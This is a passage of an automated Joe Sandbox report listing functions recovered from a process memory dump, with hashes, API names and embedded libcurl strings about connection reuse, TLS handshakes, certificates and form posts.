                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to!$Could pipeline, but not asked to!$Found bundle for host %s: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found!$Penalized, skip$Pipe is full, skip (%zu)$Server doesn't support multi-use (yet)$Server doesn't support multi-use yet, wait$can multiplex$can pipeline$serially
                                      • API String ID: 0-2820645423
                                      • Opcode ID: a80fd8af6b6aa6c080124499bc86101e556480d1348d419bb2a9617e7442b105
                                      • Instruction ID: 553b37c9ebad77d9c6120d92d5d648ae655c87bf5758f48a1a2040b5df242caf
                                      • Opcode Fuzzy Hash: a80fd8af6b6aa6c080124499bc86101e556480d1348d419bb2a9617e7442b105
                                      • Instruction Fuzzy Hash: A742D721A0DEC240FB65AF3585407B9E7A0BF48B94F984035CE6D472D5DF2CE859E3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID: bind() failed; %s
                                      • API String ID: 2635317215-1141498939
                                      • Opcode ID: f54377c56f305a470a9c82b949510dc6559042ea7cb0f78dc0305c528607ebc3
                                      • Instruction ID: fe8e814aa396abe6225120ecb28856bfdc525f5c4be03250bc9d0f4e8f0cf364
                                      • Opcode Fuzzy Hash: f54377c56f305a470a9c82b949510dc6559042ea7cb0f78dc0305c528607ebc3
                                      • Instruction Fuzzy Hash: 46416C22A08B9686EB14EB21F84436AF7A4FF5CB85F854035CE6D47390DF3CE449A354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                      • String ID:
                                      • API String ID: 2110207923-0
                                      • Opcode ID: 1daa6c712a4ac1c6b980b5a814349c12a7a0815788efa1b048e4d341e6ff901d
                                      • Instruction ID: 6455d187c86efb6cba5dcb5727b8eec32425ca690677d66b4b56f2a0a9c4d26f
                                      • Opcode Fuzzy Hash: 1daa6c712a4ac1c6b980b5a814349c12a7a0815788efa1b048e4d341e6ff901d
                                      • Instruction Fuzzy Hash: 18015A3AA1964486EB00DF61E444379F330EF98F95F988431DA1D076A4CF3CD848DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: Crypt$AcquireContextCreateHash
                                      • String ID:
                                      • API String ID: 1914063823-0
                                      • Opcode ID: 33cfcfe148ed8946f04674a79b7e45eff7db507fe921e0bc59df170c017b5a6c
                                      • Instruction ID: 545684ba5b9327d6587933f6be71d6f549bc938a26294a3a7a5234bc2949db6e
                                      • Opcode Fuzzy Hash: 33cfcfe148ed8946f04674a79b7e45eff7db507fe921e0bc59df170c017b5a6c
                                      • Instruction Fuzzy Hash: 48E0D821B1855642F7209B71E401B16E350FF98748F888030CE4C0BA54CF3CC055CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: abc21618b906d9805955336db46d658a5edf352f7718a27ab725e675ebd82f1c
                                      • Instruction ID: 2ad3d00da8ff9d6cc9d4c64f4fa60fde3aa6b30688346cedb3d09a80ca912d33
                                      • Opcode Fuzzy Hash: abc21618b906d9805955336db46d658a5edf352f7718a27ab725e675ebd82f1c
                                      • Instruction Fuzzy Hash: 2641F072A2C61286F764AF19F444635FA91EF0C390F848079D96E826D4CE7CD4486FA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d1d6c477dbe184f4e76211cb13a4e553b9471ad503ada66801840eaac7c50ac
                                      • Instruction ID: e841b9c6a3307f4a10fa9c4a03353a49ea5bbe3a1b56975e49a61ed075f91fbb
                                      • Opcode Fuzzy Hash: 9d1d6c477dbe184f4e76211cb13a4e553b9471ad503ada66801840eaac7c50ac
                                      • Instruction Fuzzy Hash: A631962190954989E39FAB7C4258A35D192EF49B00F7CC371E05F304E8EF2964CAB6F4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 12a135b66182e4c327e92f87767384b0d405adc567cf07872aa01e878b619dd7
                                      • Instruction ID: 674aac6896d362a0307da10c9437ba6f15778fcff2cbf094222b1d2f09a77c60
                                      • Opcode Fuzzy Hash: 12a135b66182e4c327e92f87767384b0d405adc567cf07872aa01e878b619dd7
                                      • Instruction Fuzzy Hash: CFA01122A0A80A80AB008B20E2A0E20A220FBACB08B888030880C0A8208E288002C200
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ae77ad71b40267e2938d4467f5d245f8485260bf8a84f67ded6026e06e31d34
                                      • Instruction ID: 3f4468a258861ed1cf05eb384379d16d3d20def8393bfb896baddd6e5a5f91cf
                                      • Opcode Fuzzy Hash: 5ae77ad71b40267e2938d4467f5d245f8485260bf8a84f67ded6026e06e31d34
                                      • Instruction Fuzzy Hash: AEA00121E0ED06D4EB48ABA0A850570E220BF69342B9800B1D02D514E1AF2DA80AA2A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 8edadf7d0d03fdc18e7b685ffea5f64f4a5bb0e6177baf17b972b57aec0580a6
                                      • Instruction ID: 0e7118913ec846f08d6718cb0717cb98d06e6889e67ba6a438a1f17632692a1f
                                      • Opcode Fuzzy Hash: 8edadf7d0d03fdc18e7b685ffea5f64f4a5bb0e6177baf17b972b57aec0580a6
                                      • Instruction Fuzzy Hash: 42F1A736649BC19AD74CAF62E5582ACF368FB99B90F480125CF6E43350CF79B0B89354
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$malloc$__swprintf_l
                                      • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$%s$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                                      • API String ID: 158892512-3362715988
                                      • Opcode ID: 2285cd0047f939e96d6d7849280c6966e933680fd110ae1c1fdc3068630887e9
                                      • Instruction ID: 75057bc295166c11c0d7c9d748390d147f170ff078399ef7697c49257a3252b1
                                      • Opcode Fuzzy Hash: 2285cd0047f939e96d6d7849280c6966e933680fd110ae1c1fdc3068630887e9
                                      • Instruction Fuzzy Hash: F0E18055A0DA8681FF14EB62B4501F8E760AF4DBC4F880172DD6E17BD6DE2CE109D3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isprint$isalnumisdigitislowerisupper
                                      • String ID: !$*$-$?$[$[$[$\$\$\$\$]$]$]$]$]$^
                                      • API String ID: 1387737040-120579343
                                      • Opcode ID: 17f1635dd946962213b61e41078252209e72aa1ab9b9e070464fb598c555fd96
                                      • Instruction ID: 732b0db95252e37ebb815874fe982f2dfb8ec12ca8facca21f40b22eb44e9c7e
                                      • Opcode Fuzzy Hash: 17f1635dd946962213b61e41078252209e72aa1ab9b9e070464fb598c555fd96
                                      • Instruction Fuzzy Hash: FF919521A0D65AC8F7646F2584003B9F7A0AF1C781FCC41B6DA6A462D1CF2DE45CB2B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpy
                                      • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                      • API String ID: 13726285-131313631
                                      • Opcode ID: 6afefcffaa024906d332abd4884f17e60de1fd345b23f3f9803589e217d855ef
                                      • Instruction ID: 9d469ff558f55b527a0c2a45243c1d9106b16e54905cd859cf5a56878a60a91d
                                      • Opcode Fuzzy Hash: 6afefcffaa024906d332abd4884f17e60de1fd345b23f3f9803589e217d855ef
                                      • Instruction Fuzzy Hash: 16719F21A0CA4295F768BF74A4183B9E251AF8C754FC44136D56E06AD5CF3CE94CE3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __stdio_common_vsscanf_strdupstrchr
                                      • String ID: %127[^/]/%127[^;,]$%255[^=]=$;filename=$;type=$Error building form post!$Illegally formatted content-type field!$Illegally formatted input field!$curl_formadd failed!$curl_formadd failed, possibly the file %s is bad!$filename=$out of memory$skip unknown form field: %s$type=
                                      • API String ID: 2016462999-3672787328
                                      • Opcode ID: 594b5320d02ba21bb09cfe4467dfdb164a606ba6279798f130d7118cca6e495c
                                      • Instruction ID: 6d74f6a0584026557e01d4ebad584346fd7c270a619c287df860bd57172ab69a
                                      • Opcode Fuzzy Hash: 594b5320d02ba21bb09cfe4467dfdb164a606ba6279798f130d7118cca6e495c
                                      • Instruction Fuzzy Hash: 38F1BD22A0C68286EB15EF25D4403BDE7A0FF89784F840135DA6D476DADF7CE508D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: malloc$ErrorLastfreereallocrecv
                                      • String ID: schannel: SNI or certificate check failed: %s$schannel: SSL/TLS connection with %s port %hu (step 2/3)$schannel: SSL/TLS handshake complete$schannel: a client certificate has been requested$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to receive handshake, need more data$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: received incomplete message, need more data$schannel: sending next handshake data: sending %lu bytes...$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                      • API String ID: 3337821324-1753479209
                                      • Opcode ID: f8af60e26bbf9e9353ac676e8705e2b78d03617e423d5848820b054c67420cc7
                                      • Instruction ID: 0642a0fe383877c6481953a4c5cc1a8f0eaa7bc58a8c50cdef471d02fffcee60
                                      • Opcode Fuzzy Hash: f8af60e26bbf9e9353ac676e8705e2b78d03617e423d5848820b054c67420cc7
                                      • Instruction Fuzzy Hash: A2F1A172A09B4186EB50AB51E448BAEE365FF48794FC00235DE2D57BD4EF3C9148E398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strcmp$isalphaislower
                                      • String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
                                      • API String ID: 3025443612-2602438971
                                      • Opcode ID: 7e865feae0c12ea4224ad9c2bedd7b3518bfa6a264da0b01f4e398956947213e
                                      • Instruction ID: c6755bf6984d8ba9d818ce01e31f5b5db0de4c526875c7783487a29316928a4f
                                      • Opcode Fuzzy Hash: 7e865feae0c12ea4224ad9c2bedd7b3518bfa6a264da0b01f4e398956947213e
                                      • Instruction Fuzzy Hash: 9F514121A0C64BD4FB10BB3584412FAD694AF18748FC944B1CE6E462C5EE6DE58DA3F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D47063
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D470A9
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00000001,?,?,?,?,00007FF7F8D42B6C), ref: 00007FF7F8D4713D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID: =$GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)
                                      • API String ID: 1294909896-2174007834
                                      • Opcode ID: ffb4fe7d57d92b30506813198e0cd7f5dd71dc373befa7c958fb12a965e24189
                                      • Instruction ID: 20c6b047e53fe1d2c0ff23473fdc3b369b9d657654b4061417b7579b9143791c
                                      • Opcode Fuzzy Hash: ffb4fe7d57d92b30506813198e0cd7f5dd71dc373befa7c958fb12a965e24189
                                      • Instruction Fuzzy Hash: 8CD12E25B0DA46C6EB10EF65F85066CE3A4BF4CB84F880071DE2E57795DE3CE40997A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • isalpha.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D45E
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4AA
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4BF
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D4C8
                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D5C4
                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D5EE
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D609
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D61F
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D628
                                      • isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D667
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D675
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D68B
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D694
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6AC
                                      • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6C2
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,00000001,00007FF7F8D0DA1E), ref: 00007FF7F8D0D6CB
                                        • Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _errno$strtoul$isdigit$__stdio_common_vsscanfisalpha
                                      • String ID: %c-%c%c$bad range$bad range specification$range overflow
                                      • API String ID: 229067821-566611384
                                      • Opcode ID: ddf05b2f87c185221f5ac8276fd8e9cdda087a67421b9681561f80f80d473db1
                                      • Instruction ID: fc534c9ce34c90eb07caa841334ca005ed9e842bc49a08dd13d735bd794d3262
                                      • Opcode Fuzzy Hash: ddf05b2f87c185221f5ac8276fd8e9cdda087a67421b9681561f80f80d473db1
                                      • Instruction Fuzzy Hash: 29B19E32A096868AE724AF25D444279F7A4FF09758F944132DA7E836C8DF3CE84CD764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
